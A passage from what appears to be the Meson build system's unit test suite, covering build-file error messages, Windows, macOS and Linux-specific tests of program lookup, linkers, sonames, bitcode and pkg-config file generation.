def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
a error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. The correct message is outputted when the .wrap file is missing for
a sub-subproject.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Subproject directory not found and .*nosubproj.wrap.* file not found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'WARNING:.* Dependency .*subsubproject.* not found but it is available in a sub-subproject.')
self.assertRegex(out, r'Subproject directory not found and .*subsubproject.wrap.* file not found')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# Finding a script in PATH w/o extension works and adds the interpreter
# (check only if `.PY` is in PATHEXT)
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
# To force people to update this test, and also test
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
os.environ
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
# generated file ourself.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/47 pkgconfig-gen/meson.build for description of the case this test
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lz -lsimple1', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
